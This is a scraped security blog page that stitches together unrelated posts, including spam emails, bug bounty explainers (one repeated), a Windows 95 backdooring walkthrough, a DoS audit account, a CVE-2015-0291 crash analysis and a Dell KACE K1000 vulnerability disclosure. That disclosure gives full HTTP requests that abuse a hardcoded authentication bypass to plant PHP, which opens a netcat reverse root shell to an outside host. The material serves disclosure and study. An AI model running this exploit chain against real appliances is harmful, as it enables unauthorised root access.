Top 18 Free Websites to Learn Hacking

Posted by KP-3မိသားစု |

  • Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • Phrack Magazine: Digital hacking magazine.
  • DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
  • SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  • NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • Hackaday: A hardware hack every day.
  • SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
  • Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
  • Makezine: Magazine that celebrates your right to tweak, hack, and bend any technology to your own will.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  • Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.

re: please send me the Facebook traffic offer

Posted by KP-3မိသားစု |


here it is, social website traffic:

Full details attached

Linda Vanderzee  

Unsubscribe option is available on the footer of our website

re: Rank 1st in google with Content Marketing Strategy

Posted by KP-3မိသားစု |

Get your business to the next level with a solid Content Marketing strategy

Allie Abelson  

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Remot3d - An Easy Way To Exploiting

Posted by KP-3မိသားစု |

Security Surprises On Firefox Quantum

Posted by KP-3မိသားစု |

This morning I've found an scaring surprise on my Firefox Quantum. Casually it was connected to a proxy when an unexpected connection came up, the browser  was connecting to an unknown remote site via HTTP and downloading a ZIP that contains an ELF shared library, without any type of signature on it.

This means two things

1) the owner of that site might spread malware infecting many many people.
2) the ISP also might do that.

Ubuntu Version:

Firefox Quantum version:

The URL: hxxp://

The zip contains these two files:

The info file:
  Name: gmpopenh264
  Description: GMP Plugin for OpenH264.
  Version: 1.6.0
  APIs: encode-video[h264], decode-video[h264]

So there is a remote codec loading system that is unsigned and unencrypted, I think is good to be aware of it.

In this case the shared library is a video decoder, but it would be a vector to distribute malware o spyware massively, or an attack vector for a MITM attacker.

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Android SSHControl V1.0 Relased!!!

Posted by KP-3မိသားစု |

Hoy sabado 15, he subido al Market de Android la versión 1.0 de SSHControl, con nuevas funcionalades y la esperada opción "Custom Commands".

Esta aplicación permite controlar tus servidores linux, bsd y unix con solo un dedo, mediante esta app Android.
Y soluciona las siguientes problemáticas:
- Manejar una shell desde el pequeño teclado de un móvil es engorroso.
- Leer todos los resultados de un comando en la pantalla del móvil, nos dejamos la vista.

Esta app permite interactuar con servidores remotos simplemente haciendo pulsaciones en la pantalla, mediante un explorador de ficheros, de conexiones, etc..

Las funcionalidades nuevas de esta versión 1.0 son:

- Administración del Firewall Iptables.
- Opción de Custom Commands, tal como había prometido.

Las funcionalidades ya presentes en la v0.8 son:

- escalada a root mediante su y sudo
- gestor de procesos
- explorador de ficheros, editor de ficheros, editor de permisos.
- monitorización y baneo de conexiones
- Visualizadores de logs
- administrador de drivers
- estadisticas de disco

Para la versión 2.0 preveo:

- Escuchar música remota
- Descarga de ficheros (wget)
- Transferencia segura de ficheros entre servidores (scp)
- Gestures, para administrar los sitemas en plan minority report :)

App disponible en el market para 861 tipos de dispositivos y pronto disponible en tablets.

Cualquier sugerencia de mejora: sha0 [4t] badchecksum [d0t] net

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Vulcan DoS Vs Akamai

Posted by KP-3မိသားစု |

In the past I had to do several DoS security audits, with múltiples types of tests and intensities. Sometimes several DDoS protections were present like Akamai for static content, and Arbor for absorb part of the bandwith.

One consideration for the DoS/DDoS tools is that probably it will loss the control of the attacker host, and the tool at least has to be able to stop automatically with a timeout, but can also implement remote response checks.

In order to size the minimum mbps needed to flood a service or to retard the response in a significant amount of time, the attacker hosts need a bandwith limiter, that increments in a logarithmic way up to a limit agreed with the customer/isp/cpd.

There are DoS tools that doesn't have this timeouts, and bandwith limit based on mbps, for that reason I have to implement a LD_PRELOAD based solution: bwcontrol

Although there are several good tools for stressing web servers and web aplications like apache ab, or other common tools used for pen-testing, but I also wrote a fast web flooder in c++ named wflood.

As expected the most effective for taking down the web server are the slow-loris, slow-read and derivatives, few host were needed to DoS an online banking. 
Remote attacks to database and highly dynamic web content were discarded, that could be impacted for sure.

I did another tool in c++ for crafting massive tcp/udp/ip malformed packets, that impacted sometimes on load balancers and firewalls, it was vulcan, it freezed even the firewall client software.

The funny thing was that the common attacks against Akamai hosts, where ineffective, and so does the slow-loris family of attacks, because are common, and the Akamai nginx webservers are well tunned. But when tried vulcan, few intensity was enough to crash Akamai hosts.

Another attack vector for static sites was trying to locate the IP of the customer instead of Akamai, if the customer doesn't use the Akamai Shadow service, it's possible to perform a HTTP Host header scan, and direct the attack to that host bypassing Akamai.

And what about Arbor protection? is good for reducing the flood but there are other kind of attacks, and this protection use to be disabled by default and in local holidays can be a mess.

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Hacking Windows 95, Part 2

Posted by KP-3မိသားစု |

In the Hacking Windows 95, part 1 blog post, we covered that through a nasty bug affecting Windows 95/98/ME, the share password can be guessed in no time. In this article, I'm going to try to use this vulnerability to achieve remote code execution (with the help of publicly available tools only).

The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.

One might think that after having a share password and user password, it is easy to achieve remote code execution. The problem is:
  • there is no "at" command (available since Windows 95 plus!)
  • there is no admin share
  • there is no RPC
  • there is no named pipes
  • there is no remote registry
  • there is no remote service management
If you think about security best practices, disabling unnecessary services is always the first task you should do. Because Windows 95 lacks all of these services, it is pretty much secure!

During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:

But the best of the best is Fluxay, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)

It is pretty hard to find the installer, but it is still out there!

But at the end, no remote code execution for me.

My idea here was that if I can find a file which executes regularly (on a scheduled basis), I can change that executable to my backdoor and I'm done. Although there is no scheduler in the default Windows 95, I gave it a try. 

Let's fire up taskman.exe to get an idea what processes are running:

Looks like we need a more powerful tool here, namely Process Explorer. Let's try to download this from

LOL, IE3 hangs, can't render the page. Copying files to the Win95 VM is not that simple, because there are no shared folders in Win95 VM. And you can't use pendrives either, Win95 can't handle USB (at least the retail version). After downloading the application with a newer browser from oldapps, let's start Process Explorer on the test Windows 95.

Don't try to download the Winsocks 2 patch from the official MS site, it is not there anymore, but you can download it from other sites

Now let's look at the processes running:

After staring it for minutes, turned out it is constant, no new processes appeared.
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...

My current Win7 has 1181 threads and 84 processes running, no wonder it is slow as hell :)

We have at least the following options:
  1. You are lucky and not the plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has built-in scheduler, especially the "at" command. Just overwrite a file which is scheduled to execution, and wait. Mission accomplished!
  2. Ping of death - you can crash the machine (no BSOD, just crash) with long (over 65535 bytes) ICMP ping commands, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it. 
  3. If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Meybe you can try to fuzz port 137 138 139, and write an exploit for those. Might be even Ping of Death is exploitable?
Let's do the first option, and hack Windows 95 plus!
Look at the cool features we have by installing Win95 Plus!

Cool new boot splash screen!

But our main interest is the new, scheduled tasks!

Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.

Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:
  • use cool black windows theme
  • put meaningless performance monitor gadgets on the sidebar
  • use a cool background, something related with hacking and skullz
  • do as many opsec fails as possible
  • instead of captions, use notepad with spelling errorz
  • there is only one rule of metal: Play it fuckin' loud!!!!

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Top Process Related Commands In Linux Distributions

Posted by KP-3မိသားစု |

Commands in Linux are just the keys to explore and close the Linux. As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well. In this blog you will exactly get the content about Linux processes commands which are are given below.


The "ps" command is used in Linux to display your currently active processes over the Linux based system. It will give you all the detail of the processes which are active on the system.

ps aux|grep

The "ps aux|grep" command is used in Linux distributions to find all the process id of particular process like if you wanna know about all the process ids related to telnet process then you just have to type a simple command like "ps aux|grep 'telnet'". This command will give you the details about telnet processes.


The "pmap" command in Linux operating system will display the map of processes running over the memory in Linux based system.


The "top" command is used in Linux operating system to display all the running processes over the system's background. It will display all the processes with process id (pid) by which you can easily kill/end the process.

Kill pid

Basically the kill command is used to kill or end the process or processes by simply giving the process id to the kill command and it will end the process or processes. Just type kill and gave the particular process id or different process ids by putting the space in between all of them. kill 456 567 5673 etc.

killall proc

The "killall proc" is the command used in Linux operating system to kill all the processes named proc in the system. Killall command just require a parameter as name which is common in some of the processes in the system.


The "bg" is the command used in Linux distributions to resume suspended jobs without bringing them to foreground.


The "fg" command is used in Linux operating system to brings the most recent job to foreground. The fg command also requires parameters to do some actions like "fg n" n is as a parameter to fg command that brings job n to the foreground.More articles
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$$$ Bug Bounty $$$

Posted by KP-3မိသားစု |

What is Bug Bounty ?

A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.

Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.

Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.

While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

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TLS V1.2 Sigalgs Remote Crash (CVE-2015-0291)

Posted by KP-3မိသားစု |

OpenSSL 1.0.2a fix several security issues, one of them let crash TLSv1.2 based services remotelly from internet.

Regarding to the TLSv1.2 RFC,  this version of TLS provides a "signature_algorithms" extension for the client_hello. 

Data Structures

If a bad signature is sent after the renegotiation, the structure will be corrupted, becouse structure pointer:
s->c->shared_sigalgs will be NULL, and the number of algorithms:
s->c->shared_sigalgslen will not be zeroed.
Which will be interpreted as one algorithm to process, but the pointer points to 0x00 address. 

Then tls1_process_sigalgs() will try to process one signature algorithm (becouse of shared_sigalgslen=1) then sigptr will be pointer to c->shared_sigalgs (NULL) and then will try to derreference sigptr->rhash. 

This mean a Segmentation Fault in  tls1_process_sigalgs() function, and called by tls1_set_server_sigalgs() with is called from ssl3_client_hello() as the stack trace shows.


The following code, points sigptr to null and try to read sigptr->rsign, which is assembled as movzbl eax,  byte ptr [0x0+R12] note in register window that R12 is 0x00

Debugger in the crash point.

radare2 static decompiled

The patch fix the vulnerability zeroing the sigalgslen.
Get  David A. Ramos' proof of concept exploit here

More information

How Do I Get Started With Bug Bounty ?

Posted by KP-3မိသားစု |

How do I get started with bug bounty hunting? How do I improve my skills?

These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to or and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read and

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.

Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

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Freefloat FTP Server 1.0 | Remote Buffer Overflow | Exploit

Posted by KP-3မိသားစု |

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

Posted by KP-3မိသားစု |

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance (""). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
; About php.ini   ;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( )
    Ncat: Listening on
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:

Example usage can be seen below:

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How Do I Get Started With Bug Bounty ?

Posted by KP-3မိသားစု |

How do I get started with bug bounty hunting? How do I improve my skills?

These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to or and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read and

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.

Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Read more
  1. What Hacking Is
  2. Pentest Kit
  3. Pentest Tools Framework
  4. Hacker Lab
  5. Pentest Android App
  6. Pentest Smtp
  7. Hacking Health
  8. Pentest Cheat Sheet
  9. Hacking Ethics
  10. Pentest Standard
  11. Pentestgeek
  12. Pentest Stages


Posted by KP-3မိသားစု |

Purpose of Hacking?
. Just for fun
.Steal important information 
.Damaging the system
.Hampering Privacy
.Money Extortion 
.System Security Testing
.To break policy compliance etc

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One Reason Why InfoSec Sucked In The Past 20 Years - The "Security Tips" Myth

Posted by KP-3မိသားစု |

From time to time, I get disappointed how much effort and money is put into securing computers, networks, mobile phones, ... and yet in 2016 here we are, where not much has changed on the defensive side. There are many things I personally blame for this situation, and one of them is the security tips.

The goal of these security tips is that if the average user follows these easy to remember rules, their computer will be safe. Unfortunately, by the time people integrate these rules into their daily life, these rules either become outdated, or these rules were so oversimplified that it was never true in the first place. Some of these security tips might sound ridiculous to people in InfoSec nowadays, but this is exactly what people still remember because we told them so for years.

PDF is safe to open

This is an oldie. I think this started at the time of macro viruses. Still, people think opening a PDF from an untrusted source is safer than opening a Word file. For details why this is not true, check:
On an unrelated note, people still believe PDF is integrity protected because the content cannot be changed (compared to a Word document).
Image stolen from Kaspersky

Java is secure

One of the best ones. Oracle started marketing Java as a safe language, where buffer overflows, format strings and pointer-based vulnerabilities are gone. Unfortunately, they forgot to tell the world that instead of "unsafe programs developed by others" they installed their unsafe program on 3 billion devices. 

Stay away from rogue websites and you will be safe

This is a very common belief I hear from average people. "I only visit some trusted news sites and social media, I never visit those shady sites." I have some bad news. At the time of malvertising and infected websites, you don't have to visit those shady sites anymore to get infected.

Don't use open WiFi

I have a very long explanation of why this makes no sense, see here. Actually, the whole recommendation makes no sense as people will connect to public WiFis, no matter what we (InfoSec) recommend.

The password policy nightmare

Actually, this topic has been covered by myself in two blog posts, see here and here. Long story short: use a password manager and 2-factor authentication wherever possible. Let the password manager choose the password for you. And last but not least, corporate password policy sux.

Sites with a padlock are safe

We tell people for years that the communication with HTTPS sites are safe, and you can be sure it is HTTPS by finding a randomly changing padlock icon somewhere next to the URL. What people hear is that sites with padlocks are safe. Whatever that means. The same goes for WiFi - a network with a padlock is safe.

Use Linux, it is free from malware

For years people told to Windows users that only if they would use Linux they won't have so much malware. Thanks to Android, now everyone in the world can enjoy malware on his/her Linux machine.

OSX is free from malware

It is true that there is significantly less malware on OSX than on Windows, but this is an "economical" question rather than a "security" one. The more people use OSX, the better target it will become. Some people even believe they are safe from phishing because they are using a Mac!

Updated AV + firewall makes me 100% safe

There is no such thing as 100% safe, and unfortunately, nowadays most malware is written for PROFIT, which means it can bypass these basic protections for days (or weeks, months, years). The more proactive protection is built into the product, the better!

How to backup data

Although this is one of the most important security tips which is not followed by people, my problem here is not the backup data advise, but how we as a community failed to provide easy to use ways to do that. Now that crypto-ransomware is a real threat to every Windows (and some OSX) users, even those people who have backups on their NAS can find their backups lost. The only hope is that at least OSX has Time Machine which is not targeted yet, and the only backup solution which really works.
The worst part is that we even created NAS devices which can be infected via worms ...

Disconnect your computer from the Internet when not used

There is no need to comment on this. Whoever recommends things like that, clearly has a problem.

Use (free) VPN to protect your anonimity

First of all. There is no such thing as free service. If it is free, you are the service. On another hand, a non-free VPN can introduce new vulnerablities, and they won't protect your anonymity. It replaces one ISP with another (your VPN provider). Even TOR cannot guarantee anonymity by itself, and VPNs are much worse.

The corporate "security tips" myth

"Luckily" these toxic security tips have infected the enterprise environment as well, not just the home users.

Use robots.txt to hide secret information on public websites

It is 2016 and somehow web developers still believe in this nonsense. And this is why this is usually the first to check on a website for penetration testers or attackers.

My password policy is safer than ever

As previously discussed, passwords are bad. Very bad. And they will stick with us for decades ...

Use WAF, IDS, IPS, Nextgen APT detection hibber-gibber and you will be safe

Companies should invest more in people and less into magic blinking devices.

Instead of shipping computers with bloatware, ship computers with exploit protection software
Teach people how to use a password safe
Teach people how to use 2FA
Teach people how to use common-sense


Computer security is complex, hard and the risks change every year. Is this our fault? Probably. But these kinds of security tips won't help us save the world. 

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